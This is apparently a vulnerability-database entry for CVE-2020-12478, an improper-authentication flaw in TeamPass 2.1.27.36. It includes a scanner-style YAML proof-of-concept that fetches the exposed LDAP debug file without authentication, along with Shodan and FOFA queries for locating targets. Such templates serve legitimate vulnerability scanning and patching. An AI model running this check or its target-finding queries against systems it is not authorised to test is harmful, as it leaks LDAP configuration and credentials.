CVE-2020-12478: TeamPass 2.1.27.36 - Improper Authentication

日期: 2025-08-01 | 影响软件: TeamPass 2.1.27.36 | POC: 已公开

漏洞描述

TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2020-12478

info:
  name: TeamPass 2.1.27.36 - Improper Authentication
  author: arafatansari
  severity: high
  description: |
    TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to sensitive information.
  remediation: |
    Upgrade to a patched version of TeamPass or apply the recommended security patches.
  reference:
    - https://github.com/nilsteampassnet/TeamPass/issues/2764
    - https://nvd.nist.gov/vuln/detail/CVE-2020-12478
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/StarCrossPortal/scalpel
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-12478
    cwe-id: CWE-306
    epss-score: 0.27795
    epss-percentile: 0.96297
    cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: teampass
    product: teampass
    shodan-query: http.html:"teampass"
    fofa-query: body="teampass"
  tags: cve2020,cve,teampass,exposure,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/files/ldap.debug.txt"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Get all LDAP params'

      - type: word
        part: header
        words:
          - "text/plain"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f019a1d4fe0ebd80bc30dce561fc0f5529dffcc90ad6541d49f9b301b55fc44a02210086910ffe6aa0a2d38dce124b8ff8171c23893612a9a66855f7fc8bf3dfaa4f08:922c64590222798bb761d5b6d8e72950